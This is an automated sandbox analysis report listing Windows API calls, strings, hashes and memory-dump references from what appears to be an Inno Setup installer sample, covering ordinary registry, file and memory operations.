                                                                                    • Instruction ID: 7183a9f40d151cc4564f9c637f0f3a65215fdab84d47651bf6ef09736f3ca39c
                                                                                    • Opcode Fuzzy Hash: 723738b8fbe3fabf7eb5c80f16a5b290c90bba58ac79f9736125b6795bdc7b1c
                                                                                    • Instruction Fuzzy Hash: C511C1302142049FD754EB6AFD82B0A7BA8E716728F10447BE810C77A1EB79AC64C79D
                                                                                    APIs
                                                                                      • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047B222,00000000,0047B35C), ref: 0047B021
                                                                                    Strings
                                                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047AFF1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpen
                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                    • API String ID: 47109696-1019749484
                                                                                    • Opcode ID: 3b78e152b17f15840806b4e47da0d6875f627c855d5fc6915719fd9d10737491
                                                                                    • Instruction ID: 32b1a4b4f3febb624688285ac2ab15cdeec5a734a0466c395ac52858640c886b
                                                                                    • Opcode Fuzzy Hash: 3b78e152b17f15840806b4e47da0d6875f627c855d5fc6915719fd9d10737491
                                                                                    • Instruction Fuzzy Hash: 7CF0E93170021467D700A55A6D02BAF528DCB80358F20407FF508EB342DABA9D06039C
                                                                                    APIs
                                                                                    • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00474FCB,0049B178,?,0046E183,?,00000000,0046E6DA,?,_is1), ref: 0046DE8F
                                                                                    Strings
                                                                                    • Inno Setup: Setup Version, xrefs: 0046DE8D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value
                                                                                    • String ID: Inno Setup: Setup Version
                                                                                    • API String ID: 3702945584-4166306022
                                                                                    • Opcode ID: 308a2d795db4d9f089db4d3a0d80863649b6fa39a5e40ce591918164ebf00fab
                                                                                    • Instruction ID: 3f565b73c41be68d18d1c675279a4c2ca8d62721aeaae2bfa6e8ff1167108c85
                                                                                    • Opcode Fuzzy Hash: 308a2d795db4d9f089db4d3a0d80863649b6fa39a5e40ce591918164ebf00fab
                                                                                    • Instruction Fuzzy Hash: 6AE06D717016043FD710AA2BDC85F6BBADCDF983A5F10403AB908EB392D578DD0081A8
                                                                                    APIs
                                                                                    • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046E544,?,?,00000000,0046E6DA,?,_is1,?), ref: 0046DEEF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value
                                                                                    • String ID: NoModify
                                                                                    • API String ID: 3702945584-1699962838
                                                                                    • Opcode ID: fcf48f294370718ea72f2974fc8c507718464dc9ad4e6ec171c14c9c323779b1
                                                                                    • Instruction ID: 16e32e904041cf2989cb5be4c2021f94977a521c7974260517dd4293f9cbe128
                                                                                    • Opcode Fuzzy Hash: fcf48f294370718ea72f2974fc8c507718464dc9ad4e6ec171c14c9c323779b1
                                                                                    • Instruction Fuzzy Hash: 64E04FB0A04304BFEB04EB55CD4AF6F77ACDB48754F104059BA089B291E674EE00C668
                                                                                    APIs
                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    Strings
                                                                                    • System\CurrentControlSet\Control\Windows, xrefs: 0042DD5E
Similarity
• API ID: Open
• String ID: System\CurrentControlSet\Control\Windows
• API String ID: 71445658-1109719901
• Opcode ID: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
• Instruction ID: aea9d63627e202933d8ac4c6cad7c964b34c473e1f77024d29d81bfc1069fbec
• Opcode Fuzzy Hash: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
• Instruction Fuzzy Hash: 6FD09E72920128BB9B009A89DC41DF7775DDB19760F44401AF90497141C1B4AC5197E4
APIs
• FindNextFileA.KERNEL32(000000FF,?,00000000,0045386F,?,00000000,004538D9,?,?,-00000001,00000000,?,0047B861,00000000,0047B7B0,00000000), ref: 0045384B
• FindClose.KERNEL32(000000FF,00453876,0045386F,?,00000000,004538D9,?,?,-00000001,00000000,?,0047B861,00000000,0047B7B0,00000000,00000001), ref: 00453869
Similarity
• API ID: Find$CloseFileNext
• String ID:
• API String ID: 2066263336-0
• Opcode ID: ce33a9adc91091840db89c3f0b9d0ab62a3048a172c241aa17054621e5542f77
• Instruction ID: 9ec0e3c397c6f5708f2a232916c112a37fe27e538a562d44e8698fe4f4711445
• Opcode Fuzzy Hash: ce33a9adc91091840db89c3f0b9d0ab62a3048a172c241aa17054621e5542f77
• Instruction Fuzzy Hash: AA81B37090424D9FCF11EF65C8417EFBBB4AF4934AF1480AAE84067392D3399B4ACB58
APIs
• GetACP.KERNEL32(?,?,00000001,00000000,0047CC8B,?,-0000001A,0047EBEA,-00000010,?,00000004,0000001A,00000000,0047EF37,?,0045D288), ref: 0047CA22
  • Part of subcall function 0042E244: 73A0A570.USER32(00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A), ref: 0042E253
  • Part of subcall function 0042E244: EnumFontsA.GDI32(?,00000000,0042E230,00000000,00000000,0042E29C,?,00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000), ref: 0042E27E
  • Part of subcall function 0042E244: 73A0A480.USER32(00000000,?,0042E2A3,00000000,00000000,0042E29C,?,00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000), ref: 0042E296
• SendNotifyMessageA.USER32(00010480,00000496,00002711,-00000001), ref: 0047CBF2
Similarity
• API ID: A480A570EnumFontsMessageNotifySend
• String ID:
• API String ID: 2685184028-0
• Opcode ID: f68c4743a9de9405453e6a0390fbdfcde8eff5ac8737c06096cd16648cf5d8d5
• Instruction ID: fce8b5d73ed99f1e2ef66d4a8ce886950ac346dadb3b378a3b6f7676f451f25a
• Opcode Fuzzy Hash: f68c4743a9de9405453e6a0390fbdfcde8eff5ac8737c06096cd16648cf5d8d5
• Instruction Fuzzy Hash: 585172346001048BC720EF26E9C668B3799EB54309B50C57FB8489B7A7C73CED468B9E
APIs
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DB64
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DBD4
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
• Opcode ID: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
• Instruction ID: dfb8c8f379aef3e71039058fa16673b54f7d2a66c5b8750361213b9ce9dda202
• Opcode Fuzzy Hash: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
• Instruction Fuzzy Hash: E6416371E04129AFDB11DF96D881BAFB7B8EB44704F91846AE800F7244D778EE00DB95
APIs
• RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DE94
• RegCloseKey.ADVAPI32(?,0042DF05,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DEF8
Similarity
• API ID: CloseEnum
• String ID:
• API String ID: 2818636725-0
• Opcode ID: c20ec2cbd5f7473bb618f7593d98c9f52b2147fe6f3bae42fe9bdb37577d9e65
• Instruction ID: 371203d48d58dd12687a59eda9429109c9bfccb849147f5bab4b3e409d052118
• Opcode Fuzzy Hash: c20ec2cbd5f7473bb618f7593d98c9f52b2147fe6f3bae42fe9bdb37577d9e65
• Instruction Fuzzy Hash: F431D570F04648AEDB11DFA6DD42BBFBBB8EB49304F91407BE500B7280D6789E01CA19
APIs
• VirtualAlloc.KERNEL32(00000000,00600000,00002000,00000001,?,?), ref: 0045CF34
• BZ2_bzDecompressInit._ISDECMP(?,00000000,00000000,?,?,?,00000000,00600000,00002000,00000001,?,?), ref: 0045CF7A
Similarity
• API ID: AllocDecompressInitVirtualZ2_bz
• String ID:
• API String ID: 3582128297-0
• Opcode ID: 939ddee8e7cb809407a1460aba98dbeb0dddb04131a165e363d28bd3e230a3f5
• Instruction ID: 1a4503516ee109fc6ad3b2554e9268a8a2595667017840414d64b8ef7de05fed
• Opcode Fuzzy Hash: 939ddee8e7cb809407a1460aba98dbeb0dddb04131a165e363d28bd3e230a3f5
• Instruction Fuzzy Hash: D0110872600700BFD310CF258982B96BBA6FF44751F044127E908D7681E7B9A928CBD8
APIs
• FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFF2
• FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B14F,00000000,0040B167,?,?,?,00000000), ref: 0040B003
Similarity
• API ID: Resource$FindFree
• String ID:
• API String ID: 4097029671-0
• Opcode ID: c217acbb35f958402dd645ed5001c515fa2723f58848c5696583f56f37880200
• Instruction ID: 91321923317e208a88a5ae6d58faa7c91e6d3ee961cd2f37f7af0eb3e2dea987
• Opcode Fuzzy Hash: c217acbb35f958402dd645ed5001c515fa2723f58848c5696583f56f37880200
• Instruction Fuzzy Hash: A401DFB1300604AFD710FF69DC92E5B77A9DB8A7187118076F500AB6D0DA7AAC1096AD
APIs
• MoveFileA.KERNEL32(00000000,00000000), ref: 00452322
• GetLastError.KERNEL32(00000000,00000000,00000000,00452348), ref: 0045232A
Similarity
• API ID: ErrorFileLastMove
• String ID:
• API String ID: 55378915-0
• Opcode ID: 835ec9a5b672ab9d24676a9d11d134ae0c37e22a40a15be47d608805de694f62
• Instruction ID: cd5642aef6cf07d7f8e9267465b44b1c19008dc4a29441b527747bf004e73304
• Opcode Fuzzy Hash: 835ec9a5b672ab9d24676a9d11d134ae0c37e22a40a15be47d608805de694f62
• Instruction Fuzzy Hash: 0301F971B04744BBCB00DFB99D415AEB7ECDB4932575045BBFC08E3252EA7C5E088598
APIs
• CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00451E2F), ref: 00451E09
• GetLastError.KERNEL32(00000000,00000000,00000000,00451E2F), ref: 00451E11
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: b7dd327be7f8f9d4ff98a7d49d2b4008869c573d79d3003604c7202f4093979a
• Instruction ID: 865e03444c10a102779f68a5f284ef85491b61924e311ce2fbbb44c68c5af0ec
• Opcode Fuzzy Hash: b7dd327be7f8f9d4ff98a7d49d2b4008869c573d79d3003604c7202f4093979a
• Instruction Fuzzy Hash: 03F0C871A04604ABCB10DF759C4269EB7E8DB49315B5049B7FC04E7652E63D5E088598
APIs
• DeleteFileA.KERNEL32(00000000,00000000,00451FC5,?,-00000001,?), ref: 00451F9F
• GetLastError.KERNEL32(00000000,00000000,00451FC5,?,-00000001,?), ref: 00451FA7
Similarity
• API ID: DeleteErrorFileLast
• String ID:
• API String ID: 2018770650-0
• Opcode ID: 3d1044f5e2d2d648e0667ff4a971c8bbcfba219cc637320a536d75e9382e69c7
• Instruction ID: 56c29436b3704a60aac7ef2d45938277689dd37fb147f6dcc6f0601c7006ef02
• Opcode Fuzzy Hash: 3d1044f5e2d2d648e0667ff4a971c8bbcfba219cc637320a536d75e9382e69c7
• Instruction Fuzzy Hash: 59F0C872A04644ABCB00DF75AC416AEB7E8DB4831575149B7FC04E3262E7385E189598
APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,0045219F,?,?,00000000), ref: 00452179
• GetLastError.KERNEL32(00000000,00000000,0045219F,?,?,00000000), ref: 00452181
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 1799206407-0
                                                                                    • Opcode ID: 6d4dbdae4b422f7f8bb4bc8d57743dba2f11a1c7441bfab1e9d389b7cfb9d745
                                                                                    • Instruction ID: 62be775e20b856c612f09eeab74c149225b5b58071cf0ad503393caa7686f059
                                                                                    • Opcode Fuzzy Hash: 6d4dbdae4b422f7f8bb4bc8d57743dba2f11a1c7441bfab1e9d389b7cfb9d745
                                                                                    • Instruction Fuzzy Hash: 2BF02870A04B08ABDB10DF759C414AEB3E8EB4572571047B7FC14A3282D7785E088588
APIs
• VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0045CEF2), ref: 0045D046
Strings
• bzlib: Too much memory requested, xrefs: 0045D021
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: AllocVirtual
• String ID: bzlib: Too much memory requested
• API String ID: 4275171209-1500031545
• Opcode ID: c63733ee34ed6dcfa19a3ccb32caffce73538764a075bf8867a72a68987aa30e
• Instruction ID: abed268314e6f1e5b27342288b91a972118d83a3dc427804377a042ebfa3a805
• Opcode Fuzzy Hash: c63733ee34ed6dcfa19a3ccb32caffce73538764a075bf8867a72a68987aa30e
• Instruction Fuzzy Hash: 87F030327001114BDB6199A988C17DA66D48F8875EF080476AF4CDF28BD6BDDC89C36C
APIs
• LoadCursorA.USER32(00000000,00007F00), ref: 00423259
• LoadCursorA.USER32(00000000,00000000), ref: 00423283
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: CursorLoad
• String ID:
• API String ID: 3238433803-0
• Opcode ID: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
• Instruction ID: 4bac6b1dd1e4bc4155aef89283820d70f6b19f6d084946fd63ee35bdac132fa3
• Opcode Fuzzy Hash: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
• Instruction Fuzzy Hash: 0BF05C11700110ABDA105D3E6CC0E2A7268DB82B36B6103BBFE3AD32D1CA2E1D01017D
APIs
• SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
• LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: ErrorLibraryLoadMode
• String ID:
• API String ID: 2987862817-0
• Opcode ID: 99dd2043f999db4e1414a2a3c1f7d5ac1e6fec7ec7d1cd9244d10c1b93de06db
• Instruction ID: 1f7e49cd896e1bdba9cb1c47732ae581670473b421036b970d27c02fb23a5fd1
• Opcode Fuzzy Hash: 99dd2043f999db4e1414a2a3c1f7d5ac1e6fec7ec7d1cd9244d10c1b93de06db
• Instruction Fuzzy Hash: ACF05E70614744BEDB029F679C6282ABAECE74DB1179248BAF800A7691E63D58108928
APIs
• GetClassInfoA.USER32(00400000,?,?), ref: 004162F1
• GetClassInfoA.USER32(00000000,?,?), ref: 00416301
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: ClassInfo
• String ID:
• API String ID: 3534257612-0
• Opcode ID: 95fcc31a687e8085c8d51d7c5e8386a7ebbc1e12afa0a833ee919d12e52ce4aa
• Instruction ID: 0adfc10981bdfd058f0d6bb489ac923dd3d4ff6eaebe16c9951958678d3e783c
• Opcode Fuzzy Hash: 95fcc31a687e8085c8d51d7c5e8386a7ebbc1e12afa0a833ee919d12e52ce4aa
• Instruction Fuzzy Hash: 50E01AB26025256AEB10DFA98D81EE32ADCDB09310B120263BE04CA286D764DD009BA8
APIs
• SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046F12D,0000003C,00000000), ref: 0044FF6E
• GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046F12D,0000003C,00000000), ref: 0044FF76
  • Part of subcall function 0044FD14: GetLastError.KERNEL32(0044FB30,0044FDD6,?,00000000,?,004962F0,00000001,00000000,00000002,00000000,00496451,?,?,00000005,00000000,00496485), ref: 0044FD17
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: e054c5ccee6c1196755840a7a8baca4f528d5ae0d9a30f87e7f7972c64a6d300
• Instruction ID: 1dbdaa83cb3dbbf4f1378df278a55a8d47ec78cb15146b3f417e0b56a3c3e3df
• Opcode Fuzzy Hash: e054c5ccee6c1196755840a7a8baca4f528d5ae0d9a30f87e7f7972c64a6d300
• Instruction Fuzzy Hash: E2E012B13056015BFB00EAA599C1F3B22D8DB49314F10487BB544CF182E674CC098B65
APIs
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: Global$AllocLock
• String ID:
• API String ID: 15508794-0
• Opcode ID: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
• Instruction ID: 0263706b80ae8aebac4b2aeda69df254121a1764ed820e2db5cbcbfbef09bb73
• Opcode Fuzzy Hash: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
• Instruction Fuzzy Hash: 3D9002C4C10B01A4DC0432B24C0BC3F0C2CD8C072C3C0486F7018B6183883C8800083C
APIs
• VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
• VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: Virtual$AllocFree
• String ID:
• API String ID: 2087232378-0
• Opcode ID: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
• Instruction ID: b33c25bc9d44e5855224c25112d8485d4e2e4d0ac397fdc44bd3a0d1e7be2c31
• Opcode Fuzzy Hash: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
• Instruction Fuzzy Hash: 3BF08272A0063067EB60596A4C85B5359C49BC5794F154076FD09FF3E9D6B98C0142A9
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,0040871A), ref: 00408603
  • Part of subcall function 00406DF4: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E11
  • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: DefaultInfoLoadLocaleStringSystem
• String ID:
• API String ID: 1658689577-0
• Opcode ID: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
• Instruction ID: 93f846491c188cfa0342f854d2ed9f3c57c1d7a82097d89a8732084db8b3b420
• Opcode Fuzzy Hash: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
• Instruction Fuzzy Hash: 11314375E001199BCF00DF95C8819DEB7B9FF84314F15857BE815AB286E738AE058B98
APIs
• SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC49
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: InfoScroll
• String ID:
• API String ID: 629608716-0
• Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
• Instruction ID: 2c7078d87c5cd90d2d28a279248f0ceb63a34b6d02ec849610dd04de18f9c6e3
• Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
• Instruction Fuzzy Hash: AA213EB1608745AFD350DF39D4407AABBE4BB48314F04893EA498C3741E778E99ACBD6
                                                                                    APIs
                                                                                      • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                      • Part of subcall function 0041EEB4: 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                                    • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046B526,?,00000000,?,?,0046B733,?,00000000,0046B772), ref: 0046B50A
                                                                                      • Part of subcall function 0041EF68: IsWindow.USER32(?), ref: 0041EF76
                                                                                      • Part of subcall function 0041EF68: EnableWindow.USER32(?,00000001), ref: 0041EF85
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
